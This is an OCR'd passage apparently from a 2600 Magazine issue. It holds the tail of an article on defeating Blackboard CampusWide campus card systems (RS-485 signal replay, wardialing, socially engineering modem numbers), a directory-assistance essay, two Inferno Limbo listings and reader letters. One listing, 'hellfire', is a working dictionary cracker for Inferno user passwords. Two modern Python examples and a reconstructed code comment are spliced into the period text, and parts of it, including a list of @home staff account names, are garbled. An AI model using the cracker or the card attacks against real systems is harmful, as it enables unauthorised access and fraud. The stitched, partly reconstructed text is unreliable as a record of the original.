lines commonly stops at the hanging ceiling. Value
Transfer Stations routinely have their backs
accessible from janitor or utility closets, which are
rarely locked. The 485 line literally comes out of
the back of a Coke machine unprotected. The
flexible piping that carries the coin wires from the
laundry reader to the washer are secured to the back of
the washer with flat head screws. It is pathetically
unprotected. The phone numbers the modems dial
from off campus eateries are easily socially
engineered out of the minimum wage workers there,
and they let you dial directly to the NP. Or you
could simply find the range of telephone numbers
of the building that the card system is housed in
and wardial it. The AP is required by Blackboard
to have a modem for diagnostics. You could steal a
copy of the GUI off a computer and then edit
people's privileges to your heart's content. And even
worse, the Envision system is exactly the same as
CampusWide, except it uses a Windows NT/2000
machine using Oracle as its database. Every flaw I
mentioned will work against Envision as well.
Hell, both systems even use the same readers! And
there is no fear of having any of your actions
logged. Once you trap the RS-485 signals from the
NP to the reader, just play it back to the reader
whenever. The AP never knows you are doing
anything and thus doesn't log it, and the reader
assumes that any data it gets must be secure. Now
tell me this. The next time you swipe a
CampusWide card to get into a football game, how do
you know someone isn't trapping the data and
creating a copy of your account onto a card from a
hacked Value Transfer Station? Hopefully this
article will force Blackboard to change to a more
secure system.
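The core weakness described above is that the reader believes any approval that reaches it. The sketch below is an added example, not Blackboard's protocol or code from the article: it models that behaviour next to a reader that only accepts an approval bound to its own fresh nonce by an HMAC. The message layout, class names, reader ids and the shared key are all constructed assumptions.

```python
"""Added example: a reader that trusts any approval vs. one that binds the
approval to a fresh nonce with an HMAC. All message layouts are constructed."""
import hashlib
import hmac
import os

KEY = b"constructed-demo-key"   # assumption: a secret shared by NP and reader


def mac(key: bytes, reader_id: bytes, nonce: bytes, amount: int, decision: bytes) -> bytes:
    """HMAC-SHA256 over length-prefixed fields so they cannot run together."""
    fields = (reader_id, nonce, str(amount).encode(), decision)
    data = b"".join(len(f).to_bytes(2, "big") + f for f in fields)
    return hmac.new(key, data, hashlib.sha256).digest()


class NetworkProcessor:
    """Stand-in for the NP and AP: approves while the balance covers the charge."""

    def __init__(self, balance: int):
        self.balance = balance

    def decide(self, amount: int) -> bytes:
        if amount > self.balance:
            return b"DENY"
        self.balance -= amount
        return b"OK"

    def signed_reply(self, reader_id: bytes, nonce: bytes, amount: int) -> bytes:
        decision = self.decide(amount)
        return decision + b"|" + mac(KEY, reader_id, nonce, amount, decision)


class LegacyReader:
    """The behaviour the article describes: whatever arrives is believed."""

    def __init__(self):
        self.vends = 0

    def on_reply(self, reply: bytes) -> bool:
        if reply == b"OK":
            self.vends += 1
            return True
        return False


class HardenedReader:
    """Accepts one authenticated answer per request it opened itself."""

    def __init__(self, reader_id: bytes):
        self.reader_id = reader_id
        self.vends = 0
        self.pending = None          # (nonce, amount) of the open request

    def start(self, amount: int) -> bytes:
        self.pending = (os.urandom(16), amount)
        return self.pending[0]

    def on_reply(self, reply: bytes) -> bool:
        if self.pending is None:
            return False             # unsolicited reply
        nonce, amount = self.pending
        decision, _, tag = reply.partition(b"|")
        want = mac(KEY, self.reader_id, nonce, amount, decision)
        if not hmac.compare_digest(tag, want):
            return False             # altered, forged, or from an older request
        self.pending = None          # one nonce authorises one answer
        if decision == b"OK":
            self.vends += 1
        return decision == b"OK"


def legacy_run(replays: int = 3):
    """One paid transaction, then the same reply bytes delivered again."""
    np_, reader = NetworkProcessor(balance=50), LegacyReader()
    recorded = np_.decide(50)
    reader.on_reply(recorded)
    for _ in range(replays):
        reader.on_reply(recorded)
    return reader.vends, np_.balance     # vends exceed what was paid for


def hardened_run(replays: int = 3):
    """Same sequence against the nonce-checking reader."""
    np_, reader = NetworkProcessor(balance=50), HardenedReader(b"laundry-C4")
    recorded = np_.signed_reply(b"laundry-C4", reader.start(50), 50)
    reader.on_reply(recorded)
    for _ in range(replays):
        reader.on_reply(recorded)        # no request open
        reader.start(50)
        reader.on_reply(recorded)        # request open, but the nonce is new
    return reader.vends, np_.balance
```

Authenticating the NP-to-reader link does nothing for the coin-pulse wires between the reader and the machine, which the article names as a separate bypass and which needs physical protection.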

Thanks to Jim at Blackboard for all the technical
info, and various websites like rs485.com,
google.com's cached webpages, and
howstuffworks.com.


Exchange Carriers). The "Incumbents" are the
guys who were around since before the breakup
of AT&T, while the "Competitives" are the new
guys on the block who are supposed to help keep
the old guys "honest" and force them to keep rates
competitive. The guys who carry your
conversations as a long distance call are IXC's
(IntereXchange Carriers).

As an old "phone phreak," it's almost
embarrassing that I should have to admit that my "day
job" is that of a Directory Assistance (DA)
operator for a major Long Distance Carrier (IXC). It
doesn't matter which one because I don't really
work for them anyway. In these modern days of
deregulation, I work for a third-party outfit that is
hired to provide the DA service cheaper than they
can do the job in-house. That's because I live in
one of the numerous "Right-To-Work" states in
the nation's sun-belt, and get paid a pittance.

One of the major embarrassments of my job
happens when someone calls for the local phone
company - not just in a small town, but even in
major cities! The phone company never puts itself
in the directory so it can be found! And of course,
I only handle White Pages. If the caller doesn't
know the name of the telco, I'm not allowed (by
FCC tariff, I'm told) to provide a "Yellow Pages"
search. I keep threatening to take some vacation
time to visit the reading room of the FCC in
Washington some time and look this stuff up, but
I really can't afford the trip (see comment on
"Right-To-Work" state above).

Since I cover a number of states in my job, I
get to look at the listings of a number of major
LEC's. Verizon will have "Verizon Wireless"
listings for every hamlet and burg in the nation - but
try to find a number for residential land-line
service that an out of state caller can ring up to see
about the problem with Aunt Minnie's account
back home, and I'm up against the tariff asking
"Do you know the name of the phone company in
that area?" Even when I break down and suggest
that Verizon is the primary local carrier in Boston,
or Ameritech in Chicago (hoping that this isn't
one of the calls being "monitored for Quality
Assurance"), just what number am I supposed to
supply? Deregulation began in 1986 with the
Modified Final Judgment. Here I am in the next
century wondering what I'm supposed to tell a
customer who's on their third call to Directory
Assistance looking to get a phone account
squared away!

People call in with the most compelling stories
about how their elderly aunt back home in
Chicago or Boston can't deal with their phone
company any more, and they need to call and take
care of the charges. Or somebody in the Rust Belt
up north is trying to reach the telco of their winter
home in the South to deal with a problem on their
bill. It isn't that I've got the time to stop and listen
to their stories, it's that I can't shut them up while
trying to search the many recurrences of the
Directory Sales Office numbers while trying to find
a listing for an out of state caller to call.

The trick here is that the phone companies
have all their information about contacting them
packed in the front pages of their local telephone
directories. In over 15 years of deregulation, it
hasn't occurred to most of them to advertise in
their own Yellow Pages under "Telephone
Companies" or to put in as big a listing in the White
Pages as their Electric Company utility brethren,
the ones they keep passing in the halls of the
Public Service Commission offices but never need to
talk to. Keep in mind that the telephone book
publishing arm of those same phone companies have
been "spun-off" so the right hand really doesn't
know what the left hand is doing because it isn't
its own left hand any more!

The other problem is when callers call out of
state DA at NPA-555-1212 (NPA is "Numbering
Plan Area," the telcos' in-house term for Area
Codes). The White Pages listings are never clear
as to where an out-of-state caller should call about
discussing a bill. Actually, I should compliment
BellSouth here. They actually do have a specific
number for out-of-state callers to dial. Let me tell
you why.

The number in most BellSouth states to reach
the telco for residential customers is 780-2355
(780-BELL). It's always a local number wherever
you call from, and if you live in an area that has
10-digit dialing, you have to use your area code in
front of that number to get there. The number is
never good from out of state, but most of my
"colleagues" in the Call Center don't know this and
give it out - causing much frustration when the
caller calls back to complain and get a good
number. It's a toll free number, and clearly marked
"out of state" but most callers don't want the "Toll
Free Number Runaround." They want a "direct
number," then get the recording that the number
in the 780 exchange is not valid.

So how does a telco go about changing the
listings in the directory database that I (and my
600 friends in my call center) use every day? Do
what we tell people who call wondering why their
number isn't in our directory: "Call your Local
Phone Company, and make sure they have your
listing correct. Our information is updated from
the information that they provide to us."

So there it is. Get with it, you telcos! Get your
act together and pretend you're "just another
American company." Even you need to check
your company's telephone book listings once in a
while. Make sure your customers can find you
when they call Directory Assistance, whether
they're in town or across the country - just like
every other company has to. Otherwise, your
customers will go to that CLEC across town. Usually,
they can be found in the Phone Book!




Regrettably, we left out the source for two utilities that went
along with last issue's article on the Inferno operating
system. We apologize for the omission and include them below:


---- clogon.b ----

# clogon
# port of wm/logon to the command line
#
# by: dalai(dalai@swbt.net)
# http://www.swbt.net/~dalai

implement clogon;

include "sys.m";
	sys: Sys;
include "draw.m";
include "sh.m";
include "newns.m";

clogon: module
{
	init:	fn(nil: ref Draw->Context, argv: list of string);
};

init(nil: ref Draw->Context, argv: list of string)
{
	sys = load Sys Sys->PATH;
	sys->print("clogon, by dalai(dalai@swbt.net)\n");

	sys->pctl(sys->FORKNS|sys->FORKFD, nil);

	progdir := "#p/" + string sys->pctl(0, nil);
	kfd := sys->open(progdir+"/ctl", sys->OWRITE);
	if(kfd == nil) {
		sys->sprint("cannot open %s: %r", progdir+"/ctl");
		sys->raise("fail:bad prog dir");
	}

	# pick the user name out of "-u user"
	usr := "";
	if(argv != nil) {
		argv = tl argv;
		if(argv != nil && hd argv == "-u") {
			argv = tl argv;
			if(argv != nil) {
				usr = hd argv;
				argv = tl argv;
			}
		}
	}

	if(usr == nil || !logon(usr)) {
		sys->print("usage: clogon -u user\n");
	}

	# build the user's namespace if a namespace file exists
	(ok, nil) := sys->stat("namespace");
	if(ok >= 0) {
		ns := load Newns Newns->PATH;
		if(ns == nil)
			sys->print("failed to load namespace builder\n");
		else if((nserr := ns->newns(nil, nil)) != nil) {
			sys->print("error in user namespace file: %s", nserr);
			sys->print("\n");
		}
	}

	sys->fprint(kfd, "killgrp");
	errch := chan of string;
	spawn exec(argv, errch);
	err := <-errch;
	if(err != nil) {
		sys->fprint(stderr(), "logon: %s\n", err);
		sys->raise("fail:exec failed");
	}
}

exec(argv: list of string, errch: chan of string)
{
	sys->pctl(sys->NEWFD, 0 :: 1 :: 2 :: nil);
	e := ref Sys->Exception;
	if(sys->rescue("fail:*", e) == Sys->EXCEPTION) {
		exit;
	}

	# start an interactive shell as the new user
	argv = "/dis/sh/sh.dis" :: "-i" :: "-n" :: nil;
	cmd := load Command hd argv;
	if(cmd == nil) {
		errch <-= sys->sprint("cannot load %s: %r", hd argv);
	} else {
		errch <-= nil;
		cmd->init(nil, argv);
	}
}

logon(user: string): int
{
	userdir := "/usr/"+user;
	if(sys->chdir(userdir) < 0) {
		sys->print("There is no home directory for that user mounted on this machine\n");
		return 0;
	}

	#
	# Set the user id
	#
	fd := sys->open("/dev/user", sys->OWRITE);
	if(fd == nil) {
		sys->print("failed to open /dev/user: %r\n");
		return 0;
	}
	b := array of byte user;
	if(sys->write(fd, b, len b) < 0) {
		sys->print("failed to write /dev/user with error: %r\n");
		return 0;
	}

	return 1;
}

stderr(): ref Sys->FD
{
	return sys->fildes(2);
}

---- clogon.b ----


hciirircth 


tf be 1 1 It re .b : /keydb/piissworil decoder 
# 

# by : dahiildalai^swbi.tiet) 

# hllp://ww vow bt. ne(/-daJui 


Page 28 


2600 Magazine 



implement hellfire;

include "sys.m";
	sys: Sys;
include "draw.m";
	draw: Draw;
include "bufio.m";
	bufio: Bufio;
	Iobuf: import bufio;
include "string.m";
	str: String;
include "arg.m";
	arg: Arg;
include "keyring.m";
	keyring: Keyring;
include "security.m";
	pass: Password;

hellfire: module
{
	init: fn(ctxt: ref Draw->Context, argv: list of string);
	usage: fn();
	finish: fn(temp: array of byte);
};

init(nil: ref Draw->Context, argv: list of string)
{
	sys = load Sys Sys->PATH;
	draw = load Draw Draw->PATH;
	bufio = load Bufio Bufio->PATH;
	str = load String String->PATH;
	arg = load Arg Arg->PATH;
	pass = load Password Password->PATH;
	keyring = load Keyring Keyring->PATH;

	sys->print("\nhellfire, by dalai (dalai@swbt.net)\n");
	sys->print("A Traumatized Production.\n");

	if(argv == nil)
		usage();

	# -d names the dictionary file, -u the user to look up
	dfile := uid := "";
	arg->init(argv);

	while((tmp := arg->opt()) != 0)
		case tmp {
		'd' => dfile = arg->arg();
		'u' => uid = arg->arg();
		}

	if(dfile == nil || uid == nil)
		usage();

	dfd := bufio->open(dfile, bufio->OREAD);
	if(dfd == nil){
		sys->print("Could not open %s.\n", dfile);
		exit;
	}

	# fetch the stored entry for the user
	pw := pass->get(uid);
	if(pw == nil) {
		sys->print("Could not get entry for %s.\n", uid);
		exit;
	}

	sys->print("cracking...\n\n");

	pwbuff2 := array[keyring->SHAdlen] of byte;
	pwbuff := array[keyring->SHAdlen] of byte;

	# try some common passwords
	for(n := 1; n < 4; n++){
		if(n == 1)
			pwbuff = array of byte "password";
		if(n == 2)
			pwbuff = array of byte uid;
		if(n == 3)
			# the third guess is not legible in the scan; an empty string is assumed
			pwbuff = array of byte "";

		keyring->sha(pwbuff, keyring->SHAdlen, pwbuff2, nil);

		temp1 := string pwbuff2;
		temp2 := string pw.pw;

		if(temp2 == temp1)
			finish(pwbuff);
	}

	# if not, try the dictionary
	for(dentry := ""; ;){
		dentry = dfd.gets('\n');
		if(dentry == nil)
			break;

		# strip the trailing newline from the dictionary entry
		if(dentry[len dentry-1] == '\n'){
			heh: string;
			(heh, nil) = str->splitl(dentry, "\n");
			dentry = heh;
		}

		pwbuff = array of byte dentry;

		keyring->sha(pwbuff, keyring->SHAdlen, pwbuff2, nil);

		temp1 := string pwbuff2;
		temp2 := string pw.pw;

		if(temp2 == temp1)
			finish(pwbuff);
	}

	sys->print("done.\n");
	sys->print("Have a nice day.\n");
	exit;
}

finish(pwbuff: array of byte)
{
	sys->print("Password is \"%s\"\n", string pwbuff);
	sys->print("Have a nice day.\n");
	exit;
}

usage()
{
	sys->print("usage: hellfire -d dictionary -u user\n");
	exit;
}

--- hellfire.b ---
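
The listing above works because each guess is hashed once with plain SHA and compared directly with the stored digest. The following is an added example, not code from the article or from Inferno: a defender's audit in Python that flags accounts whose password falls to the same kinds of guess (the word "password", the user name, a dictionary), first against an unsalted SHA-1 store modelled on that comparison and then against salted PBKDF2 records. The account names, word list, function names and iteration count are constructed for the illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 50_000  # assumed work factor for the demo; raise it for real use

# Constructed sample data; none of it comes from the article.
SAMPLE_USERS = {
    "alice": "password",        # the literal word "password"
    "bob": "bob",               # password equal to the user name
    "carol": "dragon",          # a word from the dictionary below
    "dave": "T7#qv-Lm29!xw",    # not on any guess list used here
}
WORDLIST = ["letmein", "dragon", "qwerty"]


def unsalted_record(password: str) -> bytes:
    """Weak storage: one plain SHA-1 pass over the password, no salt."""
    return hashlib.sha1(password.encode()).digest()


def salted_record(password: str, iterations: int = ITERATIONS) -> tuple:
    """Hardened storage: random per-user salt plus PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return (salt, iterations, key)


def verify_salted(password: str, record: tuple) -> bool:
    """Re-derive the key with the stored salt and compare in constant time."""
    salt, iterations, key = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, key)


def audit_unsalted(db: dict, wordlist: list) -> tuple:
    """Flag guessable accounts in an unsalted store.

    Returns (findings, hash_calls). The shared guesses are hashed once and
    that single table is reused for every account; only the user-name guess
    needs one extra hash per account.
    """
    shared = {unsalted_record(g): g for g in ["password"] + wordlist}
    hash_calls = len(shared)
    findings = {}
    for user, stored in db.items():
        hash_calls += 1
        if hmac.compare_digest(stored, unsalted_record(user)):
            findings[user] = user
        elif stored in shared:
            findings[user] = shared[stored]
    return findings, hash_calls


def audit_salted(db: dict, wordlist: list) -> tuple:
    """Flag guessable accounts in a salted store.

    Returns (findings, kdf_calls). No table can be shared: every guess has to
    be re-derived with each account's own salt, at the stored iteration count.
    """
    findings, kdf_calls = {}, 0
    for user, record in db.items():
        for guess in ["password", user] + wordlist:
            kdf_calls += 1
            if verify_salted(guess, record):
                findings[user] = guess
                break
    return findings, kdf_calls


def build_demo() -> tuple:
    """Create both stores from the constructed sample accounts."""
    unsalted = {u: unsalted_record(p) for u, p in SAMPLE_USERS.items()}
    salted = {u: salted_record(p) for u, p in SAMPLE_USERS.items()}
    return unsalted, salted


if __name__ == "__main__":
    unsalted_db, salted_db = build_demo()
    print("unsalted:", audit_unsalted(unsalted_db, WORDLIST))
    print("salted:  ", audit_salted(salted_db, WORDLIST))
```

Both audits flag the same three accounts: the salt and the iteration count remove the shared lookup table and raise the cost of every guess, but a password that is on the guess list still has to be rejected when it is set.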




Signs of Hope

Dear 2600:

I have only just discovered your radio show in the
last month, and have now downloaded most of this
year's shows and also subscribed to 2600. On the
subject of DVD players, I work in a major consumer
electronics store here in Australia. In the last 12 months all
major DVD hardware manufacturers have introduced
not just region free but region selectable players that
bypass any advanced region encoding. It started with a
few unknown Asian brands. Then Pioneer, Philips,
Samsung, L.G., Panasonic, etc. all introduced these
multi-region players (most also have mp3 playback).
The only major manufacturer not to release a player of
this type is Sony. Some of the cheaper brands can even
be Macrovision disabled. This is a direct result of both
government policy and consumer power. Government
competition policy says we can sell any DVD player
in this country (as you already know our competition
watchdog is looking very closely at the whole region
coding thing saying it may be used to artificially inflate
prices) and the consumers decided they wanted
multi-region.

The amazing thing is the response we have had in
DVD release times here. I was purchasing DVDs from
the USA and Canada last year because there was a
three to six month delay in the major release dates
between our countries. The times are now around a
month or so for most major movies, so I wait for the
better quality PAL versions (sorry, but NTSC sucks).

At the moment we are at the beginning of having
digital television forced upon us by the media giants of
the world, but that's another story.

Brelo 

This is an excellent example of the importance of
regulating huge corporations by a government which
represents the people's wishes. Because our government
and our corporations are virtually one and the
same, consumers simply don't have the power they
should have. If we ever succeed in pulling them apart,
we may have a chance. Thanks for the inspiration.

Dear 2600: 

I just got back from a major electronics store
known as "Fry's Electronics" and I got in some serious
trouble. I don't have my own transportation so I have
to ride the bus all around town. When I was in this
store, I pulled out my bus book to know what time the
next bus would come by. In doing this I had to open
my book bag that goes everywhere with me that had
some back issues of 2600 in it. Minutes later this guy
asked me to show him what was inside my bag (since
he saw me going through it). I told him sure, why not.
He opened my bag and behold - ten issues of 2600. He
said he was going to get security to escort me out. I
asked why. He said it was for hacking the store
computers. I told him it wasn't true and that all they had
were computers running winxp with no online access.
He claimed that he saw me doing it. I asked him if we
could go down to the tech bench to talk to someone
who knew what a hacker was. He agreed. We talked to
the department manager who said and I quote: "Please
leave the kid alone. There is no way he was doing
anything bad to the computers." About ten minutes later
the manager said, "So kid, how is the MPAA lawsuit
going, huh?"

avatar 

For cases that don't end so well, it's important to
know that in many places searching someone's bag in
this way is illegal and can open the establishment up
to legal action.

Higher Education 

Dear 2600:

I am in high school right now and on our school
computers there is a program installed that censors the
Internet. The Program is "Gear 31" and it's made by
Internet Content Management Software. I was wondering
if anyone knew anything about the program and
some possible loopholes in it.

A7th 

The word is out.

Dear 2600:

Not myself being a person to exceed the bounds of
the law (I try to adhere to a strict moral code), I had a
brief skirmish with the authorities of my high school
which, thankfully, did not advance very far along the
disciplinary lines. I would like to know the opinion of
some other computer users.

The school runs Novell Netware and (idiotically)
did not turn off the feature that allows users to send
messages to each other. During a typing class I was
forced to take, my fingers roamed across the keyboard
and I began to look around the system. I realized that
the system was allowing me to modify anything and
that I could send messages to another user. After
school, at a later date, I sent a message to another
classmate in another room. A classmate next to me
alerted the librarian that I was "using the computer for
bad stuff." The librarian became red in the face and
pulled me to the principal's office. She informed the
principal that I was crashing the network. I found this
to be a ludicrous charge against me but didn't contest
it, seeing as how it would upset the situation. I got off
with absolutely no penalty except that all the computer
teachers will be looking over my shoulder from now
on. My question is whether or not sending a message
to another user is a great offense.

St Mike 

The great offense is doing something that the people
in charge didn't understand. Unfortunately, in most





high schools, that applies to almost anything that
happens after the power is turned on.

Help Wanted 

Dear 2600:

I want to learn how to hack in such a bad way it
makes me sick! I have the hunger for the information
and a lot of time on my hands. I don't know how to
even begin to start my hacker education, what books to
buy, what progs or tools to get. I just picked up your
mag in a book store and couldn't believe it. Finally
answers of some type of help! I was certain. Can you
guys at least point me in the right direction? By the
way, you guys rock!

Mingus 

We get about a dozen of these letters every day. So
consider yourself honored that yours was selected
completely at random. There are a couple of things
that have to be understood. First, relatively few people
are hackers, even though quite a few either want to be
or walk around saying they are. Most of what
constitutes hacking is the whole process of figuring things
out. While we can offer tips and suggestions on
specific applications of technology, we cannot tell you
how to think. That's something you either develop on
your own or not. If you keep an open mind and don't
shy away from activities which most would view as a
complete waste of time, you're off to a good start. And
learning a little history is always a wise move - there
are plenty of online resources in addition to our
magazine which document the milestones of our community.

Dear 2600:

Hey I need some help on finding some credit card
and pin numbers so if you can help me do this I'll do
you a favor so hook me up....

Asbigasscx^aoLcStii 

Consider yourself hooked up. We get hundreds of
these requests every week, most always as a result of
some silly media report on hackers. In a weird way, the
media seems to be creating these people - they go on
the air and print stories saying that hackers go around
stealing things and then the people who go around
stealing things see this and start calling themselves
hackers. Perhaps we should come up with some choice
definitions of media so that everyone equates them
with liars.

Dear 2600:

I think my girlfriend has been cheating on me and I
wanted to know if I could get her password to Hotmail
and AOL. I am so desperate to find out. Any help
would be appreciated. Thanks.

HSFk2 

And this is yet another popular category of letter
we get. You say any help would be appreciated? Let's
find out if that's true. Do you think someone who is
cheating on you might also be capable of having a
mailbox you don't know about? Do you think that even
if you could get into the mailbox she uses that she
would be discussing her deception there, especially if
we live in a world where Hotmail and AOL passwords
are so easily obtained? Finally, would you feel better if
you invaded her privacy and found out that she was
being totally honest with you? Whatever problems are
going on in this relationship are not going to be solved
with subterfuge. If you can't communicate openly,
there's not much there to salvage.

Corrupting Youth 

Dear 2600: 

I just want to start by saying that I totally agree
with the first sentence of JohnG54429's letter in your
fall issue. It is great what you're doing for today's
youth. All that I've seen you print in your magazine is
the truth and if it causes more American youth (like
myself) to "lose morale for this great country," then so
be it! Then they won't have blind loyalty to a country
without knowing the truth. And maybe once more
people realize this, we can all help to change the
government so it will once again be something we can be
proud of.

e\_chrOnos 

Miscellaneous Info 

Dear 2600:

Just a heads up that the final build of Windows XP
home edition version 5.1.2600 (coincidence?) default
install doesn't have any firewall protection enabled.
An attacker will have access to such services as smtp,
ftp, and netbios services. To enable your firewall check
the box "Protect my computer with firewall" in the
advanced tab under the Connection Properties dialog
box. I can't believe Microsoft didn't inform the user
about this option as the average computer user has no
worries about Internet security.

Also, the investigation of Enron will be done with
a program called EnCase. This computer forensics
program enables someone to view data after it is
deleted from the most popular operating systems
currently in use. The web site
http://www.guidancesoftware.com/html/index.html allows you to request a
demo disk. Don't spoil it for everyone by ordering
20,000 of them overnight! If you know of anyone who
has the full version of this, declare them your best
friend and see if they'll burn ya a copy because it'll
cost ya $2,500!

-d&solUteii 

Dear 2600: 

Please check out these important sources of critical
information!

http://projectcensored.org
http://www.copvcia.com
http://www.indymedia.org
http://disclosureproject.org

Empty Set 

Dear 2600: 

When I first was interested in programming, I didn't
want to invest any money before I knew for sure
what it was all about. I was saved by a great language
called Python. Python is an interpreter, which means it
executes the source one line at a time instead of turning
it into machine language. Python is also object-oriented,
a near necessity for any modern language. But
perhaps the most appealing fact about python is that it



is free! The syntax of Python is remarkably clear, yet it
stays powerful and competitive. It has plenty of
documentation all over the web and is a great language for
beginners and experts alike.

The article isn't much but in my opinion Python
deserves a whole lot more respect. Feel free to edit and
add on to this article. I just want a free t-shirt or 2600
e-mail.

Raleigh f ross 

It's rather clear that's what you want. It's time once
again to clarify our policy. Letters are not articles!
And articles should not be written for the sole purpose
of getting free stuff. It's screamingly obvious when they
are.

Dear 2600: 

I am writing in response to dmitry kostyuk's letter
in your 18:4 issue. He was asking for a program to
convert Microsoft Word files into HTML files.
Microsoft Word can save as an HTML file. To do this go
to File - Save As. Click on the pull down menu labeled
"Save as Type", select HTML, type in a file name and
hit Save. Also, I have not seen the specs on Microsoft's
.doc format. However, it is used outside of Microsoft.
Sun Microsystems makes a free program called Star
Office which is capable of using Word files. Hope this
helps.

Rev ;munt 

Dear 2600: 

I just got my copy of 18:4 and was pleasantly
surprised to see the letter by "No Name" on the @home
Matrix. I agree, the information he's given out is not
much to hide one's name or handle over. The Matrix
does not, in fact, allow you to access someone's
computer directly. The Matrix works in a tier system. The
higher the tier, the more access you have.

Some of the higher tier accessing staff never
bothered to log out afterwards. They were: matrix-users,
m aj ordo mo * M atm [You bic , ani La J ohsti ton , agen tile, 
bart_. connors, hmartone, brutkow.sk i, clow cry, DHen- 
nie. Thirell_Mo.se tuy T fschmidL happ legate, jbrenuan, 
jsapienza, jtrccce. Irohinson. rsimmons, rsuIJivat^ 
shill, .1 1 7726458 1 . t wright. and j grove. 

The Matrix was located at 24/257.21)7.77, but
unfortunately it was taken down permanently as of
February 28th, 2002. However, the greatness of this
system should not be forgotten and any who wish to
learn more about it may wish to go to
bttpjTrnvln x .home ,n elidoc i M' atm 6 r pdf and read their
Matrix User's Guide.

Doodle 

Unfortunately with the demise of @home, this
address is no longer valid. If we find a mirror, we'll pass
it along.

Dear 2600: 

You may or may not already know this but I
haven't seen it in your magazine or elsewhere. The
British anarchist band Chumbawamba put a remix of
their song "Pass It Along" on their web page a while
ago. It features sound clips from Metallica, Dr. Dre,
and Eminem, all appearing without permission. Better
yet, it has excerpts from Jello Biafra's H2K keynote
speech. You can download the song and read their
press release concerning it at:
http://www.chumba.com/_passitalong.htm.

On a side note, General Motors bought the rights
to use this same song (the album version, not the
remix) in their recent Pontiac commercials.
Apparently, Chumbawamba turned around and donated half
of that money to Corp Watch, who plans on using the
money to document the "social and environmental
impacts of GM itself." The other half went to Indy Media.
Chumbawamba has a very interesting political past.
Among other things, a member once dumped a bucket
of water on Great Britain's Deputy Prime Minister
John Prescott for his handling of a dock workers'
strike. It's good to know that a (relatively) mainstream
band is this politically conscious.

I love your magazine and hope you can prevail in
your current and future endeavors. Good luck to you.

Random Juhatus 

Answers Needed 

Dear 2600: 

I'm just curious to know if your magazine has a
minimum/maximum length requirement for article
submissions. Let me know.

Kick Olson 
aka fluffy 

As indicated above, something extraordinarily
short will probably be looked at as a letter. Articles
should be as in-depth as possible without being overly
wordy. Since we wind up editing anyway, it's best to
give us as much info as you can rather than too little.
So there are no formal requirements either way - just
go with your instincts.

Dear 2600: 

I may excuse you because of the September 11th
terrorist attacks but I sent you four photographs of
payphones (by mail) and I don't have my free
subscription. I also sent an e-mail to letters@2600.com
and the only thing I got was an automated answer.
"Thank you blablabla...." Maybe sending to all of your
addresses may work. Thank you for being so
communicative.

Johnny 

First off, we have always been way too busy to
respond to each and every piece of mail we get. Most
people and certainly most magazines simply cannot do
this. Second, we're quite clear on our web page that
you will get a free subscription if your payphone
photos are printed. You seem to think that just by sending
us photos you qualify. That's not how it works. Third,
the automated answer you got from the letters e-mail
address explains that personal replies aren't possible.
Why you then chose to enter into an extended dialogue
with an automated reply function is something people
who do have time on their hands may choose to
ponder. Finally, all you succeed in doing by flooding us
with annoying mail is to be labeled as someone worthy
of being ignored altogether.

Dear 2600: 

When exactly do you plan on releasing Freedom
Downtime? It's been about a year already since it was
completed. You could at least release it on VHS; the




medium really doesn't matter.

haux 

We've wanted to release it more than anyone has
wanted to see it so we understand the frustration. We
needed to make sure we covered the legal bases with
regards to the music we used since suing us has
become corporate America's latest sport. But we're
happy to say that these hurdles are behind us and you
should find ordering info in this issue and on our web
site. For now it's in VHS format. We expect to have a
DVD version sometime in the future.

Dear 2600 : 

I would like to contribute some money to the
DeCSS appeal legal defense fund. Please let me know
how to do so.

Dill Boyle 

The Electronic Frontier Foundation covered the
legal expenses for that case. You can donate to them at
www.eff.org or by writing to EFF, 454 Shotwell Street,
San Francisco, CA 94110-1914.

Dear 2600:

I attend a meeting of security administrators at my
office every other month. In your recent issue, there
are two articles that I would like to photocopy and give
out at this meeting to give other attendees a better
understanding of what information is readily available to
people trying to break into systems and why you must
keep patches current and lock down the server. What
would be the proper way to get permission from you to
copy these articles and give them out in the meeting?

Anti- Chris! 

It's amazing to us that people actually think they
have to do this. This constitutes personal use - you
have every right to use excerpts of a publication in
such a manner without asking permission.

Dear 2600: 

My father passed away last year. Unfortunately he
used my name and social security number in the past.
Now I don't have a good credit report, and I need help.
Can you help me? I am the father of two baby girls and
I would like to buy a house one day.

top 

Assuming you don't want to continue the family
tradition and simply use your kids' SSNs, you need to
clear your name. You seem to be under the impression
that hackers go around wiping people's credit reports
or creating new identities. Of the relatively few who do
know how to easily do such things, hardly any would
ever do it for hire. And we don't talk to them.

So the first step is for you to stop acting like you're
guilty of a crime. Unless you are. (We still won't be
able to help you but we'd at least respect your
honesty.) If it happened the way you said it did, there are
ways of dealing with it. Check with the Social Security
Administration and the various credit bureaus and tell
us what they say. If you're forthcoming with them and
don't do anything stupid like ask people to help you get
fake credit, you at least have a chance of setting things
right. And even if that doesn't work, there are other
channels which can give you a voice.

Dear 2600:

I've been reading 2600 for, well, most years I
could read and comprehend what was written on the
pages of 2600. It comes time now that I have a band
and we have been ripping our brains out for names to
call ourselves and finally I suggested "2600." My only
questions are: Is this legal? Is this okay with the
writers/editors of my favorite zine? I know 2600 is only a
degree of megahertz used in phreaking, but it is a name
trademarked by you. Is this all right?

Drew

It's hertz, not megahertz. While it's a very nice
thought, we wouldn't be entirely comfortable with a
band going around with that name. What would
happen if you became really big and your music started to
suck? People would forever associate the name
"2600" with corporate rock and we'd probably wind
up getting sued by the giant record company that
signed you. Imagine the irony. But seriously, we have
no say in this. You can call yourself whatever you
want. We'd be happier, though, if it were a reference of
some sort rather than the entire name. After all, there is
always the chance that we're going to quit this
publishing thing and turn into musicians one day.

Dear 2600: 

While flipping through my recently purchased
18:4 I noticed something odd. Some of the pages were
blank! How ever will I build my wooden computer
since pages 22-2? are missing? How will I know the
outcome of the "Right Click Suppression" article
without page 19? I will not be able to Harness the
Airwaves as page Its was also blank. In addition, 35, 3 irk
39, and 42 were also blank. I hope this is just a case of
a misprinting and not a larger conspiracy by someone
to keep the information from reaching the masses. If it
was indeed just a misprinting, could the pages listed be
sent or posted somewhere so that we could read the
rest of the articles that were to have been printed on
these pages?

SuperGuldft 

If you have such a printing defect in this or any
issue, send it in to us and we'll not only send you a
replacement, but an extra issue as well for your trouble.

Dear 2600:

Just curious - do you have information stored away
